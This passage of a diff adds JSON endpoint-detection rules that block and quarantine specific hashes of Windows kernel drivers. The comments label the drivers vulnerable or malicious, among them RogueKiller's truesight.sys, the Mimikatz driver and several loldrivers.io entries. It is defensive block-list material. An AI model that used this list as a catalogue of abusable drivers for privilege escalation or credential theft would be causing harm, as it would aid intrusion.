+ "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f29ddd1da190e2000fe5d42a032650dbe36bf1c7df9efb06159387a794e766b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "607a6150-2cb2-5678-a559-ddcd385c3926", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.831602Z", + "creation_date": "2026-03-23T11:45:30.831605Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.831610Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "51857e19f774845e9ff4b463a42088bfd5a7c096fe1d3b677de4adc3e78cb239", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60856f1e-4e2e-5c78-bc77-6783b043bcaf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475532Z", + "creation_date": "2026-03-23T11:45:30.475536Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475545Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "983310cdce8397c016bfcfcc9c3a8abbb5c928b235bc3c3ae3a3cc10ef24dfbd", + "comment": 
"Vulnerable Kernel Driver (aka vboxguest.sys) [https://www.loldrivers.io/drivers/0baa833c-e4e1-449e-86ee-cafeb11f5fd5/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "608e9852-4e22-5b79-b265-4bea6a7bc908", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826300Z", + "creation_date": "2026-03-23T11:45:30.826302Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826308Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26f3439efa59eed34ebfd691aa51526ac299dbefb0a5504263e461aca531ac03", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6091bafa-edfb-5d9c-8a1d-83b564dc4387", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.826277Z", + "creation_date": "2026-03-23T11:45:31.826280Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826286Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8dffa660be7c9d6ccc87311ed2038e7f65ff271234aee91b4e6eb320ce0ccd8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "609227ab-c0e2-5ed4-a90c-71b7d22990a4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970810Z", + "creation_date": "2026-03-23T11:45:29.970814Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970822Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff93411c576df8e6bd0819a81b5c8006b3630001a0f65cd505d09ade7b151780", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"6092eebf-1724-5f54-b7ef-c0e5f28e195f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619143Z", + "creation_date": "2026-03-23T11:45:29.619144Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619150Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c58c38e4737c750ccafa621a18d875299bb5440bb1900eb8469dcf4130049c8", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60a316ca-5506-5081-8417-a195d79e801b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604807Z", + "creation_date": "2026-03-23T11:45:29.604809Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604815Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f97f6d53fff47914174bc3a05fb016e2c02ed0b43c827e5e5aadba2d244aecc", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60aea1fc-ec81-5f53-b4b7-4cb816e71dec", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973095Z", + "creation_date": "2026-03-23T11:45:29.973097Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973102Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f66b821601bbbc87aaf656f85d9c91b677a3c5e5162a69322eec51504a830c7", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60b99017-fa90-5cda-aae1-2833c4b3ecff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613753Z", + "creation_date": "2026-03-23T11:45:29.613755Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613760Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813", + "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60be8512-8a90-55cb-b95f-08cdd27aafe0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984821Z", + "creation_date": "2026-03-23T11:45:29.984823Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984829Z", + "rule_level": null, + "rule_level_override": null, + 
"rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47f08f7d30d824a8f4bb8a98916401a37c0fd8502db308aba91fe3112b892dcc", + "comment": "Dangerous Physmem Kernel Driver (aka AsrSmartConnectDrv.Sys) [https://www.loldrivers.io/drivers/57f63efb-dc43-4dba-9413-173e3e4be750/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60d97f0f-bb3a-5766-afb9-efce6a2f4811", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467792Z", + "creation_date": "2026-03-23T11:45:30.467796Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467804Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "11dc70eb8864bc00b4b8e7c62a52c4602864e2ec717cc0606e1252b119c91085", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60e325ae-75a1-5ed2-b845-27eaa34b1b88", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": 
false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145588Z", + "creation_date": "2026-03-23T11:45:31.145590Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145595Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e02a1a5c7b7fdb1a04392426a740e42f3318f5e1f597e727c6d15910fbe8e7c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60e77ad7-2b81-5685-918d-3d6452a23841", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145948Z", + "creation_date": "2026-03-23T11:45:32.145957Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145962Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9bf84b41789b3d5d5622732b5c4f5630da189ede2098b0ce166fcae331178377", + "comment": "Vulnerable Kernel Driver (aka TSDRVX64.sys) 
[https://www.loldrivers.io/drivers/424a387e-735e-49d1-99de-f067dcf1c3e9/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60ebd6f3-d4c9-52d6-9586-2076d93c6b28", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480884Z", + "creation_date": "2026-03-23T11:45:30.480887Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480892Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa0c52cebd64a0115c0e7faf4316a52208f738f66a54b4871bd4162eb83dc41a", + "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60f3c1cf-fe17-55c2-a2d6-ce82ec10d5a2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146619Z", + "creation_date": "2026-03-23T11:45:32.146621Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146627Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15e84d040c2756b2d1b6c3f99d5a1079dc8854844d3c24d740fafd8c668e5fb9", + "comment": "Resigned Vulnerable TfSysMon driver used by ValleyRAT (aka amdi2c.sys and tProtect.dll) [https://x.com/anylink20240604/status/1905691075639222521] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60f66a26-a6b7-53ac-84b3-7c00e8c29494", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153453Z", + "creation_date": "2026-03-23T11:45:31.153455Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153460Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8823296ad5d22748afcf520b42bb36a499a59075f9ab20ad284a6d298d324d7a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60fed010-f31c-528f-aa4c-d797608507b0", + "test_maturity_current_count": 0, 
+ "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.486581Z", + "creation_date": "2026-03-23T11:45:31.486585Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.486594Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2d3d845765157e937b7b28aed462df187a3cec9596addc5df54614fbd7eeb5d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "61153147-5671-535c-95bc-14ad0cc4e590", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481647Z", + "creation_date": "2026-03-23T11:45:31.481651Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481660Z", + "rule_level": null, 
+ "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "41c99deafb4d6abfd88eeba042974668ca9b353e815facf1323b4a8f82d22b14", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6150d20e-20b2-5dcb-842c-32efab2f5620", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823737Z", + "creation_date": "2026-03-23T11:45:30.823739Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823745Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0a7c832f7e92bb42275284956430c67002b58af8483d8e338af8bed6b3bef369", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6155cc1b-0efb-5388-936d-075f8b4b0ef0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144428Z", + "creation_date": "2026-03-23T11:45:32.144430Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd41e9a82e7be92a5d77624054a0b9e5e725492bae527f31e878140482ce802f", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "616a840f-9cb9-5dca-bfd6-01ad502158a9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454419Z", + "creation_date": "2026-03-23T11:45:30.454422Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454431Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230", 
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "616eb9fe-7ec6-5c14-bd03-c6014ff587a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454996Z", + "creation_date": "2026-03-23T11:45:30.454999Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455007Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cfe2dd2cf1eb8b79d3b4ae980cda6fd933979d47c837fda77256a24a41316468", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6174d307-b55e-513d-b308-817a1657f131", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144221Z", + "creation_date": 
"2026-03-23T11:45:32.144223Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144229Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7af2ff5d405cf9cd1aee2410a969ba22d6df78d98e9d4e60cbe624d8a3bc64a6", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "618785c6-cf85-585e-8b54-1d5ab7096efa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970650Z", + "creation_date": "2026-03-23T11:45:29.970654Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970661Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "866c7615e52e73cb2f462e7db41570e513b1fb577088ef14f9eff0c5559b15ac", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "618e9a30-ee48-575a-929d-ecabf2bf099c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
